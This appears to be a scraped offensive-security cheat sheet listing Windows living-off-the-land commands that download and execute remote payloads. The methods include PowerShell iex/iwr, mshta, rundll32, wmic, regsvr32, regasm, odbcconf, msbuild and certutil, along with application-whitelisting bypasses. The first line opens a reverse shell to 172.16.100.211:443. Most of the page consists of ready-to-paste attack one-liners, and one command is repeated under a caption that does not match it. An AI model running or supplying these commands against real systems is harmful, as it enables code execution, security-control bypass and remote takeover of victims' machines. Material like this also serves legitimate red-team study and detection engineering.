PowerShell
Copy powershell.exe iex (iwr http://172.16.100.211/Invoke-PowerT.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.211 -Port 443
Copy powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex But you can also call the payload directly from a WebDAV server:
Copy powershell -exec bypass -f \\webdavserver\folder\payload.ps1 Cmd
Check out the great work by Arno0x with Invoke-EmbedInBatch.ps1 heavily inspired by @xorrior work ), and see that you can easily execute any binary, dll, script:
Copy cmd.exe /k < \\webdavserver\folder\batchfile.txt Cscript/Wscript
Copy cscript //E:jscript \\webdavserver\folder\payload.txt Mshta
Copy mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) As seen in the koadic framework mshta accepts a URL as an argument to execute an HTA file:
Copy mshta http://webserver/payload.hta Rundll32
UNC Path Jscript
Copy rundll32 \\webdavserver\folder\payload.dll,entrypoint
Copy rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:
http://webserver/payload.sct");window.close(); Wmic
Copy wmic os get /format:"https://webserver/payload.xsl" Regasm/Regsvc
Application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (can be written in .Net/C# ) that will expose the proper interfaces, and you can then call it over WebDAV:
Copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u
\\webdavserver\folder\payload.dll Regsvr32
Another one from @subTee. This ones requires a slightly different scriptlet from the mshta one above. First option:
Copy regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll Second option using UNC/WebDAV:
Copy regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll Odbcconf
To be noted is that the DLL file doesn’t need to have the .dll extension. It can be downloaded using UNC/WebDAV:
Copy odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} Msbuild
Copy cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" Certutil
Great work by @subTee for discovering this:
Copy certutil -urlcache -split -f http://webserver/payload payload Now combining some commands in one line, with the InstallUtil.exe executing a specific DLL as a payload:
Copy certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll You could simply deliver an executable:
Copy certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll This information was referenced from:
